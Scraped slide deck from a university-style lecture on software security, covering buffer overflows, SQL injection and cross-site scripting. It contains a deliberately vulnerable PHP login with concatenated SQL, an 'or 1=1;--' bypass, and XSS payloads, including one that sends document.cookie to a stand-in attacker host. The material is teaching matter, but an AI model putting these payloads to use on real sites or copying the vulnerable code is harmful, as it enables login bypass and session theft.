• No results found

Introduction. Buffer Overflow. SQL Injection. Cross-Site Scripting. Software Security I. Overview. Source: SearchsoftwareQuality.techtarget.

N/A
N/A
Info
Download
Protected

Academic year: 2021

Share "Introduction. Buffer Overflow. SQL Injection. Cross-Site Scripting. Software Security I. Overview. Source: SearchsoftwareQuality.techtarget."

Copied!
20
0
0

Loading.... (view fulltext now)

Download now ( 20 Page )

Full text

(1)

Overview

 Introduction

 Buffer Overflow

 SQL Injection

 Cross-Site Scripting

Source: SearchsoftwareQuality.techtarget.com

(2)

Introduction

 Some of the most common and widely exploited software vulnerabilities are

variants of:

– Buffer Overflow

– SQL Injection

– Cross-Site Scripting

 Best countermeasure (amongst others)

– Awareness, smart programming – not allowing them to occur at all

 These flaws typically occur as a consequence of insufficient checking and

validation of data and error codes in programs

(3)

Introduction

(4)

Buffer Overflow/ Buffer Overrun

 Buffer: contiguous segment of memory that holds several instances of data

 Buffer overflow: common and widely-spread software vulnerability caused

by not properly validating user input

– allows more data to be stored than capacity available in a fixed sized

buffer

– examples of consequences of overwriting adjacent memory locations:

• corruption of program data

• unexpected transfer of control

• memory access violation

(5)
(6)
(7)

Buffer Overflow Basics

 impact of buffer overflow problem has been felt since 1988 when the Morris

worm attack was carried out

 still a problem due to both a legacy of buggy code in widely deployed

operating systems and applications (C) – and programs that do not

anticipate a certain type of faulty/ malicious input

1988

the Morris worm

2001

the Code Red worm exploits a buffer overflow in MS IIS 5.0

2003

the Slammer worm exploits a buffer overflow in MS SQL Server 2000

2004

the Sasser worm exploits a buffer overflow in MS Windows

2007

(8)

Injection Attacks

 Injection attacks

– invalid input handling

– most often occurs in scripting languages (perl, PHP, python etc.)

 SQL Injection: most widely web-based exploited injection attack

(application layer attack)

 How do you think a SQL attack would be carried out?

 What vulnerability can be exploited?

(9)

SQL Injection Attacks

Legit query

SELECT * from users

WHERE username = ‘admin’ and

password = ‘123’

Injected SQL code

SELECT * from users where username = ‘admin’ and

password =

‘XXX’ or ‘1’=‘1’

(10)

SQL Injection Attacks

DB of secret 415 agents

SQL

SELECT id FROM users

WHERE username = ‘nazli’ and password = ‘xxxx’

SELECT id FROM users

WHERE username = ‘nazli’ or 1=1 - - and password = ‘xxxx’

(11)

SQL Injection Attacks (index.html)

<html>

<head><title>SQL Injection Demo</title></head>

<body onload="document.getElementById('user_name').focus();" >

<form name="login_form" id="login_form" method="post" action="login.php">

<table border=0 align="center" >

<tr>

<td colspan=5 align="center" ><font face="Century Schoolbook L" > Login Page </font></td>

</tr>

<tr>

<td> User Name:</td><td> <input type="text" size="13" id="user_name" name="user_name"

value=""></td>

</tr>

<tr>

<td> Password: </td><td> <input type="password" size="13" id="pass_word" name="pass_word"

value=""></td>

</tr>

<tr>

<td colspan=2 align="center"><input type="submit" value="Login"> </div></td>

</tr>

</table>

</form>

</body>

(12)

SQL Injection Attacks (login.php)

<?php

$Host= '192.168.1.8';

$Dbname= 'john';

$User= 'john';

$Password= 'xxx';

$Schema = 'test';

$Conection_string="host=$Host dbname=$Dbname user=$User password=$Password";

/* Connect with database asking for a new connection*/

$Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW);

/* Error checking the connection string */

if (!$Connect) {

echo "Database Connection Failure";

exit;

}

$query="SELECT * from $Schema.users where user_name='".$_POST['user_name']."' and

password='".$_POST['pass_word']."';";

$result=pg_query($Connect,$query);

$rows = pg_num_rows($result);

if ($rows) {

echo "Login Success";

}

Username field: or 1=1;--

Password field: empty

(13)

Effects of SQL Injection Attacks

 bypass of login page/ backdoor

 DOS

 iframe injection

 access to system files

 stealing of sensitive information (personnel and credit)

 vulnerability of other computers on LAN

(14)

SQL Injection Attacks

(15)

Cross-Site Scripting (XSS)

 Common application layer hacking technique

 Exploit vulnerabilities in the code of Web applications

 Dynamically generated website do not have complete control over how their

outputs are interpreted by browser/ client

 Especially relevant in the age of widespread use of “guestbook” programs:

– wikis, and blogs, social networking

• which all allow users accessing the site to leave comments

– which are subsequently viewed by other users.

 Unless the contents of these comments are checked, and any dangerous

code removed, an attack is inevitable

(16)

Cross-Site Scripting (XSS)

(17)

Cross-Site Scripting (XSS)

 Some ways in which your webpage could be infected?

<script src=http://hacker-site.com/xss.js></script>

<body onload=alert("XSS")>

<body background="javascript:alert('XSS')">

<img src="javascript:alert('XSS');">

<iframe src=”http://hacker-site.com/xss.html”>

(18)

XSS

If this text were saved by a guestbook application, then when viewed by others, it will

display a little text and also then execute the Javascript code

Many sites require users to register before using features like a guestbook

application. With this attack, a user’s (anyone who views the comment) cookie is

supplied to the attacker, who could then use it to impersonate the user on the original

site

T h a n ks f o r t h i s i n f or m a t io n , i t s g r e a t!

< s c r ip t > d oc u m e nt . l o ca t i o n= ' ht t p : // h a c ke r . w eb . s i te / c o ok i e . cg i ? ' +

d o c u me n t . co o k i e< / s c ri p t >

(19)

Common XSS Example

1. John often visits an informative website hosted by Kevin

2.

Kevin’s website enables John to log in (username/password) and store sensitive

information, such as credit card, bank accounts etc.

3. Badam devises a plan to exploit any possible vulnerability – he creates a URL and

sends John a friendly “post”, in which he embeds the URL

4. The malicious script embedded in the post executes in John’s (or

___________________) browser, as if it came directly from Kevin’s server – what’s

bad about this?

5. Badam can then use the session cookie to possibly steal sensitive information

available to John (authentication credentials, cc and banking info, etc) without John’s

knowledge

(20)

Common XSS Example

Defenses Against XSS?

Cross-Scripting Cheat Sheet

http://ha.ckers.org/xss.html

References

Download now ( PDF - 20 Page - 301.38 KB )

Related documents

Test Assertions for the SCA WS-BPEL Client and Implementation Version 1.1 Specification

Tags “component type” “reference” “partner link” “static analysis” Comment Assertion ID SBL-TA-2007 Source [SBPEL2009] Target Prerequisites Predicate Prescription Level

The effects of purchasing alcohol and marijuana among adolescents at-risk for future substance use

Compared to non-purchasers, dual-purchasers reported more days of marijuana use, more time spent around teens who used other illegal drugs than non- purchasers, greater intentions

A s s u r a n c e and A dv i s o ry B u s i n e s s Serv i c e s. U.S. GAAP v. IFRS: The

Once a subsidiary’s financial statements are remeasured into its functional currency, both standards require translation into its parent’s functional currency with assets

Magic Moments for Structured Output Prediction

Finally we derive learning-theoretic bounds on the performance of these algorithms, showing that the SODA cost function is related to the rank of the correct output among the

Whitepaper. Considerations When Evaluating a Playout System Implementation

By abandoning the conventional approach of delivering and branding television in multiple disparate steps, integrated playout systems hold the key to radically simplifying

Self-Fashioning, Double Consciousness, and a History of Representation: The Narratives of Frederick Douglass and Solomon Northup as Compared to Runaway Slave Advertisements

African Americans like Frederick Douglass were born into slavery and experienced at a young age the projected identity of being less than human by their white oppressors. Northup

Using Blogs in EFL Teaching - A Case Study of Macedonia

The main aim of the study, a stated in section 3.1 was to analyze the effectiveness of using Blogs and Blogging, to support learning in an English Language Methodology course,

CONSTRUCTION COSTS INDEX FOR RESIDENTIAL BUILDINGS, SLOVENIA

of two indices, namely the construction material costs index and the labour cost index (measured in labour cost per hour worked), resulting from the construction of